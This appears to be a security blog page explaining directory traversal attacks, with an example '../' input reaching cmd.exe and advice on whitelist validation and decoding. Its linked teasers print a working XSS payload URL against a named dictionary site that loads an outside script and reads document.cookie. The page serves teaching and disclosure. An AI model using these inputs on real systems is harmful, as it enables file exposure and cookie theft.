Directory Traversal Overview

Directory Traversal vulnerabilities occur once again when the user supplied input is not validated. You think we would get tired of saying this, but it appears this is a very common problem with software. A directory traversal exploit typically occurs when the following types of characters are not checked for correctly: . / \
Take for example a url like the following

www.yoursite.com/openfile.php?filename=myfile.txt

This php page is referencing a myfile.txt which it is going to output to the current html page. Seems like this shouldn’t be a problem. Except if you are a malicious user. A malicious user would look at this url and instantly an idea would come into his/her head. What if instead of myfile.txt is placed, a ./myfile.txt is inputted directly. Well you would think that should work it’s just referencing the same local file, but the problem is the ./ If a ./ is accepted what about a ../ or maybe a ../../
If you are thinking correctly you remember that the ../ references one directory below the current directory. Now taking this into concept and beforing a bit more, a malicious user could input something similar to a ../../system32/cmd.exe which would call the cmd.exe applications within the windows web server. This will have dangerous potential and is a huge security violation.
URLEncoded and other Unicode Variations

Protecting just against the . / and \ is not enough. Malicious users are a smart bunch. They will use URLEncoding and other variations of Unicode to bypass your checking and validation attempts.
How to protect against Directory Traversal attacks

To protect against directory traversal attacks, the developer will need to validate the input correctly against a white list. Now you can’t just say no . is allowed, because maybe in this case you might want to allow a . It would be best to use a regular expression to verity the filename passed in. A regular expression can be created to accept only an alpha-numeric filename followed by a . then a three character filename. This would provide some additional protection against the directory traversal attack.

Unfortunately we still need to go another step further. To protect against URLEncoded and Unicode variation attacks you will need to use a URLDecoded function and unicode converter to verify that you are working only with the ASCII set of characters.

Explore More

How to Detect a Hacker Attack?

How to Detect a Hacker Attack Most computer vulnerabilities can be exploited in a variety of ways. Hacker attacks may use a single specific exploit, several exploits at the same

Read More

Twitter accounts hacked : Barack Obama, Britney etc on the list

According to twitter, a micro blogging site, 33 twitter accounts were compromised and false and inappropriate messages were posted online. Hacked accounts include prominent twitter sources like President-elect Barack Obama,

Read More

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Read More